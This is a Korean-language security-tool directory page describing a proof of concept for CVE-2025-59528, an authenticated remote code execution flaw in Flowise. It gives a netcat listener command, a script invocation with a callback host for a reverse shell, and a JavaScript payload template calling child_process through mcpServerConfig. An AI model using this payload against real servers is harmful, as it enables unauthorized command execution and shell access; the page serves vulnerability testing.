Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59528 — CVE-2025-59528에 대한 개념 증명으로, mcpServerConfig 주입을 통한 Flowise의 인증된 원격 코드 실행을 시연하며, 승인된 테스트를 위한 재현 가능한 절차를 포함합니다. | Kitploit
도구/GitHubGitHub/nymiitechtips/cve-2025-59528
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubnymiitechtips/cve-2025-59528

CVE-2025-59528

CVE-2025-59528에 대한 개념 증명으로, mcpServerConfig 주입을 통한 Flowise의 인증된 원격 코드 실행을 시연하며, 승인된 테스트를 위한 재현 가능한 절차를 포함합니다.

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Version française

CVE-2025-59528 개념 증명 (Proof of Concept)

승인된 환경에서 취약점의 기술적 검증에 초점을 맞춘 최소 PoC입니다.

사전 요구 사항

  • 대상 Flowise 대시보드에 사용자 계정이 있어야 합니다.
  • 해당 계정에 연결된 유효한 API 키가 있어야 합니다.
  • PoC를 실행하기 전에 콜백 호스트에서 리스너를 시작해야 합니다 (예: nc -lvn 4444).

사용 예시

먼저 리스너를 시작합니다:

root@kitploit:~
nc -lvn 4444
root@kitploit:~
python3 poc.py --domain example.com --host 10.10.10.1 --port 4444 --api YOUR_VALID_API_KEY

값을 승인된 환경 설정에 맞게 교체하세요.

CVE 요약

  • 영향을 받는 제품: Flowise
  • 영향을 받는 버전: 3.0.5 미만
  • 유형: 원격 코드 실행 (RCE)
  • 진입점: POST /api/v1/node-load-method/customMCP 엔드포인트
  • 문제는 inputs.mcpServerConfig가 처리되는 방식에서 발생합니다. 이 값은 서버 측 JavaScript 실행을 허용하는 방식으로 해석됩니다. 실제로 인증된 공격자는 child_process를 호출하고 OS 명령을 실행하는 표현식을 주입할 수 있습니다.

    악용 메커니즘

    악용 흐름은 다음과 같습니다:

    1. customMCP 엔드포인트에 요청을 구성합니다.
    2. mcpServerConfig에 악성 JavaScript 표현식을 넣습니다.
    3. process.mainModule.require('child_process')를 트리거합니다.
    4. OS 명령(exec/execSync)을 실행합니다.

    승인되면 서버는 시스템 컨텍스트에서 명령을 실행합니다.

    이 PoC의 작동 방식 (poc.py)

    이 스크립트는 네 가지 인수를 받습니다:

    • -d/--domain: 대상 도메인
    • -lh/--host: 콜백 IP
    • -lp/--port: 콜백 포트
    • -A/--api: Bearer API 토큰

    그런 다음 다음을 수행합니다:

    1. 취약한 URL을 구성합니다: http://<domain>/api/v1/node-load-method/customMCP
    2. Authorization: Bearer <token> 헤더를 추가합니다
    3. 콜백 셸 명령을 준비합니다
    4. 해당 명령을 JS 표현식에 주입합니다:
    root@kitploit:~
    ({
      x: (function () {
        const cp = process.mainModule.require("child_process");
        cp.exec("<commande>");
        return 1;
      })(),
    });
    
    1. 다음 JSON을 전송합니다:
    root@kitploit:~
    {
      "loadMethod": "listActions",
      "inputs": {
        "mcpServerConfig": "<injected JS expression>"
      }
    }
    
    1. 검증을 위해 HTTP 상태와 원시 응답을 출력합니다.

    이 PoC가 더 나은 이유 (EDB 52440 대비)

    EDB PoC(이메일/비밀번호 로그인 수행, 브라우저 유사 헤더 사용, 자유 형식 --cmd 실행)와 비교하여, 이 스크립트는 순수 PoC 검증에 더 적합합니다:

    1. 더 직접적임: 로그인 흐름이 없고 불필요한 HTTP 노이즈가 적습니다.
    2. 더 낮은 파손 가능성: 프론트엔드/인증 구성에 얽힌 단계가 적습니다.
    3. CI 친화적 자동화: 간단한 인수와 빠른 출력.
    4. 더 명확한 검증: 상태와 본문이 즉시 출력됩니다.
    5. 핵심 CVE 경로에 집중: mcpServerConfig 주입 및 서버 측 실행.

    요약하자면: EDB 스크립트는 더 일반적인 공격 데모인 반면, 이 PoC는 기술적 재현성에 더 초점을 맞춥니다.

    현재 제한 사항

    • 유효한 API 토큰이 이미 존재한다고 가정합니다.
    • https 모드 또는 인증서 처리가 없습니다.
    • 재시도/백오프 로직이 없습니다.
    • 콜백 명령이 하드코딩되어 있습니다 (아직 --cmd로 매개변수화되지 않음).

    책임 있는 사용

    소유한 시스템 또는 명시적 승인을 받은 시스템에서만 테스트하세요.

    도구 다운로드